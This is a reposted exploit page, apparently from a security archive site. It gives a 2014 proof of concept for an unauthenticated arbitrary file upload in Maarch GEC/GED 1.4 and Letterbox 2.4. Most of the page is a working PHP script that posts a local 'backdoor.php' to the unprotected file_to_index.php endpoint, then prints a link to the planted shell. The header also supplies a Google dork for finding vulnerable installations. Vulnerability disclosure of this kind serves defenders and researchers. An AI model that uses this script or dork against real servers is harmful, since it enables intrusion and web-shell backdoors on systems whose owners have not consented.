首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MAARCH 1.4 - Arbitrary File Upload
来源:http://asylum.seraum.com 作者:Thierry 发布时间:2014-10-30  
/******************************************************
# Exploit Title: Maarch 1.4 Arbitrary file upload
# Google Dork: intext:"Maarch Maerys Archive v2.1 logo"
# Date: 29/10/2014
# Exploit Author: Adrien Thierry
# Exploit Advisory: http://asylum.seraum.com/Security-Alert-GED-ECM-Maarch-Critical-Vulnerabilities.html
# Vendor Homepage: http://maarch.org
# Software Link: http://downloads.sourceforge.net/project/maarch/Maarch%20Entreprise/Maarch-1.4.zip
# Version: Maarch GEC <= 1.4 | Maarch Letterbox <= 2.4
# Tested on: Linux / Windows
******************************************************/

The file "file_to_index.php" is accessible without any authentication to upload a file.

This exploit code is a POC for Maarch Letterbox <= 2.4 and Maarch GEC/GED <= 1.4

Exploit code :

<?php

/* EXPLOIT URL  */
$target_url= "http://website.target/apps/maarch_enterprise/";
/* EMPTY FOR OLDS VERSIONS LIKE LETTERBOX 2.3 */
$indexing_path = "indexing_searching/";
/* TARGET UPLOAD FILE */
$target_file = "file_to_index.php";
/* FILE TO UPLOAD IN SAME PATH AS THIS SCRIPT */
$file = "backdoor.php";
/* NAME, EMPTY WITH LETTERBOX */
$name = "shell";

/* LAUNCHING EXPLOIT */
do_post_request($target_url . $indexing_path . $target_file . "?md5=" . $name, $target_url, $file, $name);

function do_post_request($url, $res, $file, $name)
{
    $data = "";
    $boundary = "---------------------".substr(md5(rand(0,32000)), 0, 10);
    $data .= "--$boundary\n";
    $fileContents = file_get_contents($file);
    $md5 = md5_file($file);
    $ext = pathinfo($file, PATHINFO_EXTENSION);
    $data .= "Content-Disposition: form-data; name=\"file\"; filename=\"file.php\"\n";
    $data .= "Content-Type: text/plain\n";
    $data .= "Content-Transfer-Encoding: binary\n\n";
    $data .= $fileContents."\n";
    $data .= "--$boundary--\n";
    $params = array('http' => array(
    'method' => 'POST',
    'header' => 'Content-Type: multipart/form-data; boundary='.$boundary,
    'content' => $data
    ));

$ctx = stream_context_create($params);
    $fp = fopen($url, 'rb', false, $ctx);
    if (!$fp)
    {
       throw new Exception("Erreur !");
    }
    $response = @stream_get_contents($fp);
    if ($response === false)
    {
       throw new Exception("Erreur !");
    }
    else
    {
        echo "file should be here : ";
            /* LETTERBOX */
            if(count($response) > 1) echo $response;
            /* MAARCH ENTERPRISE | GEC */
            else echo "<a href='" . $res . "tmp/tmp_file_" . $name . "." . $ext . "'>BACKDOOR<a>";

    }
}

?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IBM Tivoli Monitoring 6.2.2 kb
·Joomla RD Download SQL Injecti
·Mini-stream RM-MP3 Converter 3
·GNU Wget FTP Symlink Arbitrary
·CUPS Filter Bash Environment V
·Xerox Multifunction Printers (
·vBulletin Tapatalk - Blind SQL
·Mac OS X Mavericks IOBluetooth
·云端博弈——云安全入侵取证及思
·Drupal < 7.32 Pre Auth SQL Inj
·Windows TrackPopupMenu Win32k
·Linux Local Root => 2.6.39 (32
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved